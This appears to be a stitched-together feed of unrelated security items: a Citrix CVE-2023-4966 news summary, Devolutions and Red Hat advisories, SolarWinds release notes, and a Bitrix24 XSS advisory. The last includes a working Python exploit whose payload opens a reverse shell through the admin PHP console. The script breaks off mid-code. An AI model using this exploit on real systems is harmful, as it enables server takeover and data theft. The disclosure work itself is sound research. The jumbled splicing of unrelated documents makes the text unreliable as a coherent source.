By Waqas
Mandiant Investigates Zero-Day Exploitation in Citrix Vulnerability, CVE-2023-4966.
This is a post from HackRead.com Read the original post: Mandiant Tracks Four Uncategorized Groups Exploiting Citrix Vulnerability

According to Mandiant, the Citrix vulnerability which specifically impacts NetScaler ADC and Gateway appliances, has been detected in the wild since late August 2023.

Citrix, a provider of NetScaler ADC and Gateway appliances, released a security bulletin on October 10, 2023, detailing a vulnerability (CVE-2023-4966) exposing sensitive information. Mandiant, a **Google-owned** prominent cybersecurity firm, has identified instances of both zero-day exploitation and subsequent exploitation of this vulnerability following Citrix’s disclosure.

The vulnerability specifically affects NetScaler ADC and Gateway appliances and has been observed in the wild since late August 2023, continuing after the release of the security advisory by the company.

Mandiant’s investigations revealed successful exploitation incidents, allowing threat actors to take control of legitimate user sessions on these Citrix appliances, bypassing authentication measures, including passwords and multi-factor authentication.

Mandiant’s findings shed light on factors that help in identifying exploitation activities and highlight various post-exploitation techniques witnessed during their incident response investigations.

**Vulnerable Endpoints**

When Citrix released firmware updates addressing **CVE-2023-4966**, Mandiant employed similar methods as **Assetnote**, an external attack surface management firm, to identify vulnerable functions and create a proof of concept (PoC). Prior to Citrix’s publication, Mandiant was already investigating session takeovers, which they believed were the result of zero-day exploitation.

With differential firmware analysis, they pinpointed the vulnerable endpoint by crafting an HTTP GET request with an extended Host header, causing a vulnerable appliance to expose system memory contents, potentially revealing a valid NetScaler AAA session cookie.

**Investigation Challenges**

A significant challenge in investigating these vulnerable appliances lies in the absence of request logging for the vulnerable endpoint on the appliance’s web server. Mandiant recommends relying on **web application firewalls (WAF)** or similar network appliances recording HTTP/S requests directed towards these NetScaler devices to identify attempted exploitations.

**Techniques for Identifying Exploitation**

Mandiant outlined several techniques to identify potential exploitation and subsequent session hijacking. These include scrutinizing WAF logs, identifying suspicious login patterns in NetScaler logs, checking Windows Registry keys, and analyzing memory core dump files.

**Post-Exploitation Activities**

Following successful exploitation, Mandiant observed several post-exploitation tactics, such as surveillance, credential harvesting, and lateral movement through RDP. Threat actors used various tools and techniques to gain access, including **Mimikatz** for dumping process memory and deploying remote monitoring and management (RMM) tools like Atera, **AnyDesk**, and **SplashTop**.

**Victimology and Attribution**

Mandiant’s investigation spans multiple sectors, including legal, professional services, technology, and government organizations in the Americas, EMEA, and APJ regions. They are tracking four distinct uncategorized (UNC) groups involved in exploiting this vulnerability.

> _“Mandiant is currently tracking four distinct uncategorized (UNC) groups involved in exploiting this vulnerability. We have observed some lower degrees of confidence overlaps in post-exploitation stages among these UNC groups, like using the same recon commands and utilities available on Windows. The common tools observed across multiple intrusions were: csvde.exe certutil.exe local.exe nbtscan.exe.”_
> 
> Mandiant

**Timothy Morris**, Chief Security Advisor at Tanium also commented on the issue and wanted that the Netscaler exploitation is at large scale right now. “Session Hijacking” could be low risk, however, it could also be extremely high-risk, depending upon the session being hijacked,” Morris said.

“It is important that customers patch immediately and do the necessary incident response threat hunting. In other words, don’t assume that “If I patch, I’m good.” That might prevent the next exploitation attempt (i.e. repairing the broken window) but doesn’t resolve what might have already happened (i.e. who is already in the house due to the previously broken window),” added Morris.

**Remediation Efforts**

Mandiant published a **blog post** offering remediation recommendations and guidance to mitigate this vulnerability.

In conclusion, this revelation provides insights into the exploitation and post-exploitation activities resulting from the Citrix vulnerability CVE-2023-4966. Mandiant’s ongoing investigation aims to understand the intricacies of the exploit and provide comprehensive guidance for remediation.

****_Editor’s note:_****

_The article includes limited technical details about the vulnerability, exploitation techniques, and detection methods. Please note that this is a summarization of the extensive information provided in the original blog post by Mandiant._

****_RELATED ARTICLES_****

1.  Critical RCE Vulnerability Puts 330,000 Fortinet Firewalls at Risk
2.  Cisco Catalyst SD-WAN Manager Systems Exposed to DoS Attacks
3.  JetBrains Patches TeamCity Flaw Allowing RCE and Server Hijacking
4.  iLeakage Attack: Theft of Sensitive Data from Apple’s Safari Browser
5.  Mozilla Rushes to Fix Critical Vulnerability in Firefox and Thunderbird

Mandiant Tracks Four Uncategorized Groups Exploiting Citrix Vulnerability

Improper access control in the password analyzer feature in Devolutions Remote Desktop Manager 2023.2.33 and earlier on Windows allows an attacker to bypass permissions via data source switching.


**DEVO-2023-0019****Summary**

Remote Desktop Manager Windows and Devolutions Server are affected by security vulnerabilities.

**Affected Products**

Remote Desktop Manager Windows 2023.2.33 and earlier Devolutions Server 2023.2.10.0 and earlier

**Change Log**

2023-11-01 - Initial Publication

**Severity**

High

**Product**

Remote Desktop Manager Windows, Devolutions Server

**Fix Version**

RDMW 2023.3.20, DVLS 2023.3.4

**Remote code execution in Remote Desktop Manager****Description**

A remote code execution vulnerability in Remote Desktop Manager 2023.2.33 and earlier on Windows allows an attacker to remotely execute code from another windows user session on the same host via a specially crafted TCP packet.

**Remediation and Workarounds**

Upgrade to Remote Desktop Manager Windows 2023.3.20 or higher.

**Severity**

CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H 8.8 High

**Affected Products**

Remote Desktop Manager Windows 2023.2.33 and earlier

**CVE(s)**

CVE-2023-5766

**Improper access control in Password Analyser feature****Description**

Improper access control in the password analyzer feature in Devolutions Remote Desktop Manager 2023.2.33 and earlier on Windows allows an attacker to bypass permissions via data source switching.

**Remediation and Workarounds**

Upgrade to Remote Desktop Manager Windows 2023.3.20 or higher.

**Severity**

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N 4.3 Medium

**Affected Products**

Remote Desktop Manager Windows 2023.2.33 and earlier

**CVE(s)**

CVE-2023-5765

**Improper access control in Report log filters feature****Description**

Improper access control in Report log filters feature in Devolutions Server 2023.2.10.0 and earlier allows attackers to retrieve logs from vaults or entries they are not allowed to access via the report request url query parameters.

**Remediation and Workarounds**

Upgrade to Devolutions Server 2023.3.4.0 or higher

**Severity**

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N 4.3 Medium

**Affected Products**

Devolutions Server 2023.2.10.0 and earlier

**CVE(s)**

CVE-2023-5358

CVE-2023-5765: Devolutions

A use-after-free vulnerability was found in drivers/nvme/target/tcp.c` in `nvmet_tcp_free_crypto` due to a logical bug in the NVMe-oF/TCP subsystem in the Linux kernel. This issue may allow a malicious user to cause a use-after-free and double-free problem, which may permit remote code execution or lead to local privilege escalation in case that the attacker already has local privileges.

**Red Hat Product Security Center**

Engage with our Red Hat Product Security team, access security updates, and ensure your environments are not exposed to any known security vulnerabilities.

Product Security Center

CVE-2023-5178: cve-details

The Network Configuration Manager was susceptible to a Directory Traversal Remote Code Execution Vulnerability.  This vulnerability allows a low-level user to perform the actions with SYSTEM privileges.  

CVE-2023-33226

The Network Configuration Manager was susceptible to a Directory Traversal Remote Code Execution Vulnerability This vulnerability allows a low level user to perform the actions with SYSTEM privileges.  

CVE-2023-33227

SolarWinds Platform Incomplete List of Disallowed Inputs Remote Code Execution Vulnerability. If executed, this vulnerability would allow a low-privileged user to execute commands with SYSTEM privileges.

Release date: November 1, 2023

Here's what's new in SolarWinds Hybrid Cloud Observability 2023.4.

SolarWinds Hybrid Cloud Observability runs on the SolarWinds Platform.

**Learn more**

*   See the Hybrid Cloud Observability 2023.4 system requirements.
*   For information about working with Hybrid Cloud Observability, see the Hybrid Cloud Observability Administrator Guides.

**New features and improvements in Hybrid Cloud Observability**

For information about new features and fixes in the SolarWinds Platform, see the SolarWinds Platform 2023.4 Release Notes.

**New Vulnerability Dashboard and Risk scorecard**

This release introduces a new vulnerability and risk dashboard, available for Hybrid Cloud Observability Advanced users. View vulnerability and risk severity, determined by imported CVE information from CVEs based on CVSS v3. Schedule CVE data imports, and match CVE information to individual nodes. See calculated risk scores for individual monitored nodes and an aggregated risk scored for your environment.

**Platform Connect supports more device types**

Platform Connect now supports sending information for more device types to SolarWinds Observability, including application and virtualization.

**Greater visibility for simplified SD-WAN monitoring**

Real-time Tunnel and WAN metrics like service provider, packet loss, latency, and jitter are now available for use in dashboard widgets and PerfStack for Meraki, VeloCloud, and Viptela SDWAN devices.

**Anomaly Based Alerts improvements**

Anomaly Based Alerts now includes a new visual representation of the normal operating range (NOR) of a device’s metrics. The entity detail page contains NOR charts for every observed metric present for the entity that is triggering an Anomaly-Based Alert.

You can now define anomaly-based alerts for virtualization entities. See the list of supported entities with their metrics below:

Orion.VIM.ClusterStatistics:

AvgCPULoad

AvgMemoryUsage

Orion.VIM.HostStatistics:

AvgCpuLoad

AvgMemUsage

AvgNetworkUtilization

Orion.VIM.VMStatistics:

AvgCPULoad

AvgIOPSRead

AvgIOPSTotal

AvgIOPSWrite

AvgMemoryUsage

AvgNetworkUsageRate

**AlertStack improvements**

AlertStack is now available under the “Alerts and Activities” menu.

The AlertStack cluster detail page now supports filtering of occurrences together with maps. Occurrences can be filtered based on the Status and Element Type. Accordingly, the map nodes reflect this filtering as well.

AlertStack now supports creation of incidents in SolarWinds Service Desk (SSD) for AlertStack clusters. This action can be done for clusters in open or suspended states only.

Return to top

**Fixes**

For information about new features and fixes in the SolarWinds Platform, see the SolarWinds Platform 2023.4 Release Notes.

 

Case number

Description

01189602, 01296329, 01268284

In deployments with additional polling engines (APEs), attempting to integrate the SolarWinds Platform with DPA would install the DPA Business Layer on the APE. This caused problems with the DPA integration, including:

*   Application relationships added on the Manage Client Application Relationships page were automatically removed.
    
*   Integration fails with the message There was an error when trying to enable the integration with the DPA server: Establishing federation with jSWIS failed.
    
*   Attempting to add a DPA server returns the message Cannot find a DPA server at this address or port. Check your DPA server details and network connection.
    

01231016

When custom properties used in alerts are created in a different SolarWinds Platform product, the associated column in the All Active Alerts page in EOC is not blank.

01354791

When you run a report that queries the SolarWinds log database, the results of the query are shown instead, not the message Query is not valid.

01288735

In a large, complex environment, network configuration management jobs and inventory jobs run as expected.

01358044

Network configuration management jobs no longer make unnecessary APE license checks, which were causing the jobs to run slowly.

00837847, 01358148, 01426785

Inventory collection was updated to prevent database blocks, which were affecting performance.

01352472

If you run a job that saves the results of a policy report to a file, and the file name includes a macro, the macro is parsed correctly and the report's content and formatting are accurate.

01336072

When SolarWinds high availability (HA) is deployed, a network configuration search performed after a failover includes all configs. The search is not limited to only the most recently downloaded configs.

01357688

A vulnerability that could expose a password has been fixed.

01350788

A misspelled word in INFO messages in the NCM.Collector.Jobs_[*].log file has been corrected.

01333319

The Config Details page shows the downloaded time based on the SolarWinds Platform time zone, not UTC time.

01288735, 01387785

When an inventory job retrieves a large Flash Size value, it records the value correctly and no longer returns the following error:

Arithmetic overflow error converting expression to data type int.

01395082

Real Time Change Notification works as expected when the IP address provided to it is not the primary IP address for the node.\*

01428683, 01330623, 01349629

In 2023.2, the default timeout value for SWJobEngineWorker2x64.exe was increased from 20 minutes to 2 hours. In deployments with a large number of jobs that did not finish before the 2-hour timeout, memory usage increased significantly. To prevent this issue, the default timeout value has been decreased to 20 minutes.

01295129, 01350421, 01428125

When the SolarWinds Platform is configured to use Windows authentication, running interface percentile traffic reports no longer returns an error.

01367640

If an interface name includes special characters, the special characters are no longer escaped on the Interfaces with High Percent Usage (no paging) resource. This behavior was preventing database maintenance from running as scheduled.

01355454

The load time for the Interface Availability widget has been significantly decreased.

01349629, 01362966

By default, network discovery enables all pollers on a device. So, if a topology poller is disabled on the List Resources or Manage Pollers page, it is enabled again when network discovery runs. A new advanced configuration option is available to enable you to override this default behavior. If do not want certain topology pollers to be enabled when network discovery runs:

1.  Open the Advanced Configuration options page by pasting the following into your browser URL field after the hostname or IP address:
    
    /Orion/Admin/AdvancedConfiguration/Global.aspx
    
2.  Under Topology, locate the PollersDiscoveryBlackList field.
    
3.  Enter a comma-separated list of topology pollers that should **not** be enabled when network discovery runs.
    

01348970, 01350142, 01361854, 01362953, 01420814, 01430172

Out-of-the-box Switch Stack alerts can be copied and edited, and they are triggered as expected.

01235174, 01401553

Universal Device Poller gauges load without errors and performance is improved.

01373033

If application data is corrupted, the Manage Applications and Service Ports page no longer attempts to list the applications. Corrupt data does not prevent the page from opening with the following message:

Unexpected Website Error  
Sequence contains no elements

Additionally, a daily maintenance task detects and removes any corrupt application data.

01323874

If a user without permission to view NetFlow data attempts to access a NetFlow page, permissions are evaluated and the Restricted page message is displayed before the page loads. The page is no longer loaded and then hidden, and attempts to refresh the page do not affect performance.

01321325

A change to the NetFlowInterfaceSources\_Metadata table in the SolarWinds Platform database prevents deadlocks in environments with a large number of VMware devices.

01400259, 01419304, 01420644

If a deployment includes more than one application template with the same name, the Configuration Wizard no longer fails with the following error:

Database configuration failed: Error while executing script- Subquery returned more than 1 value.

01360008, 01379355, 01390806, 01399847, 01400259

The SolarWinds Platform Web Console no longer becomes unresponsive or stops functioning due to missing keys in the cloud monitoring resource file.

01337117

On the Node Details Summary page, when you click Real Time Event Viewer and then click the Message column for an event, the Message Details popup opens as expected.

N/A

When you add a node with Microsoft SQL Server 2022 deployed, AppInsight for SQL is discovered.

01290468, 01305182, 01317562, 01320352, 01320666

During upgrades data from old tables is migrated successfully and the obsolete tables are removed. In a previous version, incomplete data migration could cause issues such as:

*   The Configuration Wizard failed with the message Invalid object name 'APM_ComponentStatus_Hourly.
    
*   The SolarWinds Platform database size decreased significantly.
    
*   The Application Component Details page did not consistently display messages.
    

01183556, 01337907, 01353375, 01389703

If the Configuration Wizard fails during an upgrade, attempting to rerun the wizard no longer fails with the message Error while executing script- There is already an object named 'CLM_CloudJobSettings' in the database.

01337806

When a problem occurs with the API poller, the following message was improved to provide more information about the cause of the problem:

Index was outside the bounds of the array.

01142194, 01357225, 01438644

When a node is deleted or unmanaged, Application Dependency Mapping (ADM) polling does not continue for that node. In previous versions, continuing to poll a deleted or unmanaged node for ADM data caused the ADM\_ProcessingQueue table to become very large.

01379396

Long status messages associated with an application monitor are displayed correctly after an upgrade.

00690113

Alerts on API Pollers that should be triggered when the response time exceeds a threshold are no longer triggered when the response time is below the threshold.

01142194

If ADM polling is disabled for the SolarWinds Platform, the node detail page does not display the Application Dependency Polling Enabled check box.

00990851, 01415486

If AppInsight for IIS runs for long periods, the APM\_IisBb\_Request\_Detail table no longer grows without limits, causing performance issues.

01372348, 01384875

The CreateApplication verb in SWIS for the AppInsight for SQL template now works when you are using a remote node and database. Issues with credentials and connection testing have been resolved.

01401922

The default poll no longer fails when more than one array is in a Nimble cluster.

00385337

The Vserver Status widget and the Vservers on this Cluster widget now show the same Vserver capacity data.

01382411

The Ethernet Ports Used Over Time now shows data for the selected time period instead of only the data for the current day.

01361966

When a wireless node is discovered with UDT port monitoring enabled and devices from the node are added to the Watchlist, the Watchlist widget no longer displays type conversion errors such as:

Conversion failed when converting the nvarchar value 'Vanguard_WLC' to data type int.

00814339

The Port Details widget now displays the MAC address, IP address, or Hostname for all devices.

00570890, 00582046, 00717223

The All User Log Ins widget displays data about the currently open endpoint, not the first endpoint that was opened.

01314714, 01333769, 01351695, 01365630, 01365850, 01382555, 01398156, 01412701, 01420009, 01426518, 01436135

The Port Details widget displays IP addresses even if the VLAN port is not monitored.\*

01308188, 01332779, 01380614, 01382170, 01396520, 01404094

When a node uses automatic private IP addressing (APIPA), the vendor and machine type are reported correctly.

01353982, 01401047

Database maintenance no longer fails with the following message:

SolarWinds.Data.DatabaseMaintenance.StandardTableHandlerDAL - Failed to execute procedure: VIM_dbm_Clusters_ComputeDiskDepletion System.Data.SqlClient.SqlException (0x80131904): Arithmetic overflow error converting expression to data type bigint.

Cursor is not open.

01429919

The bulk insert query no longer runs slowly and causes performance issues on the database.

01238012

The Calls by Region widgets display the correct data.

01348659, 01371344

IP SLA operations function correctly, and the ipsla.bussiness.layer log file no longer includes the message Violation of PRIMARY KEY constraint.

01238012, 01294332

The FTP server is no longer filled with failed files, and VoIP views displays call manager information correctly.

01394210

After a call manager is removed, any associated CDR files are no longer processed, which prevents putting an unnecessary load on the FTP server.

01373525, 01378655

Call managers are polled only by the assigned polling engine, not by all polling engines.

01203334

When CDR files for different call managers are stored in separate folders on the FTP server, CDR files for all call managers are processed. VNQM no longer ignores CDR files for all call managers except the last one added.

01269194, 01439830

Avaya RTCP data is collected and displayed as expected.\*

01329850

A large number of CDR or CMR files on the FTP server no longer cause an out of memory exception.\*

\*This fix was added after the RC release.

Return to top

**Installation or upgrade**

For new installations, you can download the installation file from the product page on https://www.solarwinds.com or from the Customer Portal. For more information, see Get the installer.

For upgrades, go to Settings > My Deployment to initiate the upgrade. The SolarWinds Installer upgrades your entire deployment (all SolarWinds Platform products and any scalability engines).

For more information, see the SolarWinds Platform Product Installation and Upgrade Guide.

You must be on Orion Platform 2020.2.1 or later to upgrade to SolarWinds Hybrid Cloud Observability 2023.4. If you are on a version earlier than Orion Platform 2020.2.1, first upgrade to 2020.2.6 and then upgrade to 2023.4.

Return to top

**Before you upgrade!**

If you are upgrading from a previous version, be aware of the following considerations:

Upgrading from Orion Platform 2020.2.6 or older -

*   Before upgrading from Orion Platform 2020.2.6 and earlier to SolarWinds Hybrid Cloud Observability, check the SolarWinds Platform release notes for additional information.

Return to top

**Legal notices**

© 2023 SolarWinds Worldwide, LLC. All rights reserved.

This document may not be reproduced by any means nor modified, decompiled, disassembled, published or distributed, in whole or in part, or translated to any electronic medium or other means without the prior written consent of SolarWinds. All right, title, and interest in and to the software, services, and documentation are and shall remain the exclusive property of SolarWinds, its affiliates, and/or its respective licensors.

SOLARWINDS DISCLAIMS ALL WARRANTIES, CONDITIONS, OR OTHER TERMS, EXPRESS OR IMPLIED, STATUTORY OR OTHERWISE, ON THE DOCUMENTATION, INCLUDING WITHOUT LIMITATION NONINFRINGEMENT, ACCURACY, COMPLETENESS, OR USEFULNESS OF ANY INFORMATION CONTAINED HEREIN. IN NO EVENT SHALL SOLARWINDS, ITS SUPPLIERS, NOR ITS LICENSORS BE LIABLE FOR ANY DAMAGES, WHETHER ARISING IN TORT, CONTRACT OR ANY OTHER LEGAL THEORY, EVEN IF SOLARWINDS HAS BEEN ADVISED OF THE POSSIBILITY OF SUCH DAMAGES.

The SolarWinds, SolarWinds & Design, Orion, and THWACK trademarks are the exclusive property of SolarWinds Worldwide, LLC or its affiliates, are registered with the U.S. Patent and Trademark Office, and may be registered or pending registration in other countries. All other SolarWinds trademarks, service marks, and logos may be common law marks or are registered or pending registration. All other trademarks mentioned herein are used for identification purposes only and are trademarks of (and may be registered trademarks) of their respective companies.

CVE-2023-40062: SolarWinds Hybrid Cloud Observability 2023.4 Release Notes


A logic error when using mb_strpos() to check for potential XSS payload in Bitrix24 22.0.300 allows attackers to bypass XSS sanitisation via placing HTML tags at the begining of the payload.







**Summary:**

**Product**

Bitrix24

**Vendor**

Bitrix24

**Severity**

Critical

**Affected Versions**

Bitrix24 22.0.300 (latest version as of writing)

**Tested Versions**

Bitrix24 22.0.300 (latest version as of writing)

**CVE Identifier**

CVE-2023-1715 & CVE-2023-1716

**CVE Description**

_(CVE-2023-1715)_: A logic error when using mb\_strpos() to check for potential XSS payload in Bitrix24 22.0.300 allows attackers to bypass XSS sanitisation via placing HTML tags at the begining of the payload. _(CVE-2023-1716)_: Cross-site scripting (XSS) vulnerability in Invoice Edit Page in Bitrix24 22.0.300 allows attackers to execute arbitrary JavaScript code in the victim’s browser, and possibly execute arbitrary PHP code on the server if the victim has administrator privilege.

**CWE Classification(s)**

CWE-83 Improper Neutralization of Script in Attributes in a Web Page

**CAPEC Classification(s)**

CAPEC-592 Stored XSS

**CVSS3.1 Scoring System:**

**Base Score:** 9.0 (Critical) **Vector String:** CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H

**Metric**

**Value**

**Attack Vector (AV)**

Network

**Attack Complexity (AC)**

Low

**Privileges Required (PR)**

Low

**User Interaction (UI)**

Required

**Scope (S)**

Changed

**Confidentiality (C)**

High

**Integrity (I)**

High

**Availability (A)**

High

**Vulnerability Details:**

This report presents information on a Cross Site Scripting (XSS) vulnerability in Bitrix24’s Invoice Edit page that allows an attacker to run arbitrary JavaScript code on the browser of any victim that visits the affected page. If the victim has administrator permissions, an attacker may leverage the built-in “PHP Command Line” feature to execute arbitrary system commands on the target web server.

Authorized users may edit an invoice they have access to via the crm.invoice.edit component, located at bitrix/components/bitrix/crm.invoice.edit/component.php and accessible via a post request to https://TARGET_HOST/bitrix/urlrewrite.php?SEF_APPLICATION_CUR_PAGE_URL=/crm/invoice/edit/INVOICE_ID/.

One of the fields that can be supplied by an attacker is the USER_DESCRIPTION field. As this field is rendered as HTML by a rich text editor in the frontend, sanitization is performed on this field to prevent XSS:

    // bitrix/components/bitrix/crm.invoice.edit/component.php lines 746 to 763
    
    $userDescription = trim($_POST['USER_DESCRIPTION']);
    $bSanitizeUserDescription = ($userDescription !== '' && mb_strpos($userDescription, '<')); // [1]
    if($bSanitizeComments || $bSanitizeUserDescription)
    {
        $sanitizer = new CBXSanitizer();
        $sanitizer->ApplyDoubleEncode(false);
        $sanitizer->SetLevel(CBXSanitizer::SECURE_LEVEL_MIDDLE);
        //Crutch for for Chrome line break behaviour in HTML editor.
        $sanitizer->AddTags(array('div' => array()));
        $sanitizer->AddTags(array('a' => array('href', 'title', 'name', 'style', 'alt', 'target')));
        $sanitizer->AddTags(array('p' => array()));
        $sanitizer->AddTags(array('span' => array('style')));
        if ($bSanitizeComments)
            $comments = $sanitizer->SanitizeHtml($comments);
        if ($bSanitizeUserDescription)
            $userDescription = $sanitizer->SanitizeHtml($userDescription);
        unset($sanitizer);
    }
    

The mb_strpos($userDescription, '<') check ([1]) is supposed to check if the user description contains the < character, which could indicate that this field contains HTML tags and thus requires sanitization. However, if the < character is the first character, mb_strpos($userDescription, '<') would be 0, resulting in $bSanitizeUserDescription being false. Thus, sanitization of this field can be completely bypassed.

The $userDescription field is subsequently saved to the database, along with the rest of the invoice data.

However, the built-in Bitrix XSS sanitizer, applied to the body parameters of every request, complicates exploitation of this vulnerability.

The XSS sanitizer uses several regular expressions (regex) to identify and sanitize potentially dangerous input. One of these aims to target HTML event handlers, which could lead to XSS. The regex used can be found in bitrix/modules/security/lib/filter/auditor/xss.php on line 173, and a simplified version is shown below:

    /(on[a-z]*)([a-z]{3}[\s]*=)/is
    

The regex aims to identify patterns such as onerror= and uses two capturing groups to split the dangerous string into two parts. A space is then added between the two parts, neutralizing the event handler. For example, onerror= would be transformed into oner ror=. Note that the regex allows any amount of whitespace between the event handler name (eg onerror) and the equals sign (=). This is compliant with the HTML specification. On its own, this sanitizer is secure.

When an authorized user navigates to the invoice edit page, the stored invoice is retrieved. The user description field is then passed to the CLightHTMLEditor class as the content to be edited.

The configuration for this editor, including the content, is injected into the JavaScript context after sanitization by the CUtil::PhpToJSObject function.

    <script>
    // ...
    // bitrix/modules/fileman/classes/general/light_editor.php line 254
    top.<?=$this->jsObjName?> = window.<?=$this->jsObjName?> = new window.JCLightHTMLEditor(<?=CUtil::PhpToJSObject($this->JSConfig)?>);
    // ...
    </script>
    

The CUtil::PhpToJSObject function calls the CUtil::JSEscape function (shown below) on the value of each key-value pair in the $this->JSConfig array.

    // bitrix/modules/main/tools.php lines 4349 to 4355
    
    public static function JSEscape($s){
        static $aSearch = array("\xe2\x80\xa9", "\\", "'", "\"", "\r\n", "\r", "\n", "\xe2\x80\xa8", "*/", "</");
        static $aReplace = array(" ", "\\\\", "\\'", '\\"', "\n", "\n", "\\n", "\\n", "*\\/", "<\\/");
        $val = str_replace($aSearch, $aReplace, $s);
        return $val;
    }
    

This function performs a simple string replacement on the input string $s to ensure that it does not contain any characters that may break out of a JavaScript string, such as ", ' or \.

Notably, this function replaces the byte string \xe2\x80\xa9 (U+2029 Unicode Paragraph Separator) with a regular space (U+0020 Space).

This is a significant transformation as the Bitrix XSS sanitizer does not regard the byte string \xe2\x80\xa9 as whitespace. Therefore, the string onerror\xe2\x80\xa9= would not be sanitized. However, CUtil::JSEscape would transform the string into onerror =, which is a valid HTML onerror event handler.

After sanitization and transformation by CUtil::JSEscape, the constructor of the JavaScript class JCLightHTMLEditor injects the content to be edited into HTML:

    // bitrix/js/fileman/light_editor/le_core.js lines 616 to 618
    
    this.pEditorDocument.open();
    this.pEditorDocument.write('<html><head></head><body>' + sContent + '</body></html>');
    this.pEditorDocument.close();
    

Therefore, a malicious attacker may create an invoice with user description <img src=x onerror\xe2\x80\xa9=alert(document.domain)>. As < is the first character in the string, sanitization in bitrix/components/bitrix/crm.invoice.edit/component.php is bypassed. Additionally, as onerror\xe2\x80\xa9= does not match the regex for an event handler, the built-in XSS sanitizer does not sanitize this string. Finally CUtil::JSEscape replaces \xe2\x80\xa9 with , resulting in <img src=x onerror =alert(document.domain)>. This string is then injected into HTML, resulting in XSS.

**Proof-of-Concept:**

We have tried our best to make the PoC as portable as possible. This report includes a functional exploit written in Python3 that edits an existing invoice to inject malicious HTML in the user description field.

A sample exploit script is shown below:

    # Bitrix24 Invoice Edit Page XSS RCE (CVE-2023-XXXXX)
    # Via: https://TARGET_HOST/crm/invoice/edit/XXXX
    # Author: Lam Jun Rong (STAR Labs SG Pte. Ltd.)
    
    #!/usr/bin/env python3
    import base64
    
    import requests
    import re
    import os
    import typing
    import subprocess
    import threading
    
    HOST = "http://localhost:8000"
    SITE_ID = "s1"
    USERNAME = "user"
    PASSWORD = "abcdef"
    
    TARGET_INVOICE_ID = 3
    
    LPORT = 9001
    LHOST = "192.168.86.43"
    
    PROXY = {"http": "http://localhost:8080"}
    
    
    def nested_to_urlencoded(val: typing.Any, prefix="") -> dict:
        out = dict()
        if type(val) is dict:
            for k, v in val.items():
                child = nested_to_urlencoded(v, prefix=(k if prefix == "" else f"[{k}]"))
                for key, val in child.items():
                    out[prefix + key] = val
        elif type(val) in [list, tuple]:
            for i, item in enumerate(val):
                child = nested_to_urlencoded(item, prefix=f"[{i}]")
                for key, val in child.items():
                    out[prefix + key] = val
        else:
            out[prefix] = val
        return out
    
    
    def dict_to_str(d):
        return "&".join(f"{k}={v}" for k, v in d.items())
    
    
    def check_creds(cookie, sessid):
        return requests.get(HOST + "/bitrix/tools/public_session.php", headers={
            "X-Bitrix-Csrf-Token": sessid
        }, cookies={
            "PHPSESSID": cookie,
        }, proxies=PROXY).text == "OK"
    
    
    def login(session, username, password):
        if os.path.isfile("./cached-creds.txt"):
            cookie, sessid = open("./cached-creds.txt").read().split(":")
            if check_creds(cookie, sessid):
                session.cookies.set("PHPSESSID", cookie)
                print("[+] Using cached credentials")
                return sessid
            else:
                print("[!] Cached credentials are invalid")
        session.get(HOST + "/")
        resp = session.post(
            HOST + "/?login=yes",
            data={
                "AUTH_FORM": "Y",
                "TYPE": "AUTH",
                "backurl": "/",
                "USER_LOGIN": username,
                "USER_PASSWORD": password,
            },
        )
        if session.cookies.get("BITRIX_SM_LOGIN", "") == "":
            print(f"[!] Invalid credentials")
            exit()
        sessid = re.search(re.compile("'bitrix_sessid':'([a-f0-9]{32})'"), resp.text).group(
            1
        )
        print(f"[+] Logged in as {username}")
        with open("./cached-creds.txt", "w") as f:
            f.write(f"{session.cookies.get('PHPSESSID')}:{sessid}")
        return sessid
    
    
    def edit_invoice(session: requests.Session, sessid):
        payload = base64.b64encode("""
        fetch("/bitrix/admin/php_command_line.php?lang=en&"+window.parent.document.body.innerHTML.match(/sessid=[a-f0-9]{32}/)[0],{
            method:"POST",
            headers:{
              'Content-Type': 'application/x-www-form-urlencoded'
            },    
            body: new URLSearchParams({
                query: `$sock=fsockopen("LHOST",LPORT);$proc=proc_open("/bin/sh -i", array(0=>$sock, 1=>$sock, 2=>$sock),$pipes);`,
                ajax: "y",
                result_as_text:"N"
            })
        })
        """.replace("LHOST", LHOST).replace("LPORT", str(LPORT)).encode())
        session.post(
            HOST + f"/bitrix/urlrewrite.php?SEF_APPLICATION_CUR_PAGE_URL=%2Fcrm%2Finvoice%2Fedit%2F{TARGET_INVOICE_ID}%2F",
            headers={
                "Content-Type": "application/x-www-form-urlencoded",
            },
            data={
                "sessid": sessid,
                "CRM_INVOICE_EDIT_V12_active_tab": "tab_1",
                "ACCOUNT_NUMBER": TARGET_INVOICE_ID,
                "ORDER_TOPIC": "sss",
                "STATUS_ID": "N",
                "PAY_VOUCHER_DATE": "",
                "PAY_VOUCHER_NUM": "",
                "REASON_MARKED_SUCCESS": "",
                "DATE_MARKED": "",
                "REASON_MARKED": "",
                "PRIMARY_ENTITY_TYPE": "COMPANY",
                "PRIMARY_ENTITY_ID": "1",
                "SECONDARY_ENTITY_IDS": "7",
                "REQUISITE_ID": "0",
                "BANK_DETAIL_ID": "0",
                "PAY_SYSTEM_ID": "1",
                "UF_MYCOMPANY_ID": "0",
                "MC_REQUISITE_ID": "0",
                "MC_BANK_DETAIL_ID": "0",
                "RECUR_PARAM[PERIOD]": "1",
                "RECUR_PARAM[DAILY_INTERVAL_DAY]": "1",
                "RECUR_PARAM[DAILY_WORKDAY_ONLY]": "N",
                "RECUR_PARAM[WEEKLY_INTERVAL_WEEK]": "1",
                "RECUR_PARAM[WEEKLY_WEEK_DAYS][]": "1",
                "RECUR_PARAM[MONTHLY_TYPE]": "1",
                "RECUR_PARAM[MONTHLY_INTERVAL_DAY]": "1",
                "RECUR_PARAM[MONTHLY_WORKDAY_ONLY]": "N",
                "RECUR_PARAM[MONTHLY_MONTH_NUM_1]": "1",
                "RECUR_PARAM[MONTHLY_WEEKDAY_NUM]": "0",
                "RECUR_PARAM[MONTHLY_WEEK_DAY]": "1",
                "RECUR_PARAM[MONTHLY_MONTH_NUM_2]": "1",
                "RECUR_PARAM[YEARLY_TYPE]": "1",
                "RECUR_PARAM[YEARLY_INTERVAL_DAY]": "1",
                "RECUR_PARAM[YEARLY_WORKDAY_ONLY]": "N",
                "RECUR_PARAM[YEARLY_MONTH_NUM_1]": "1",
                "RECUR_PARAM[YEARLY_WEEK_DAY_NUM]": "0",
                "RECUR_PARAM[YEARLY_WEEK_DAY]": "1",
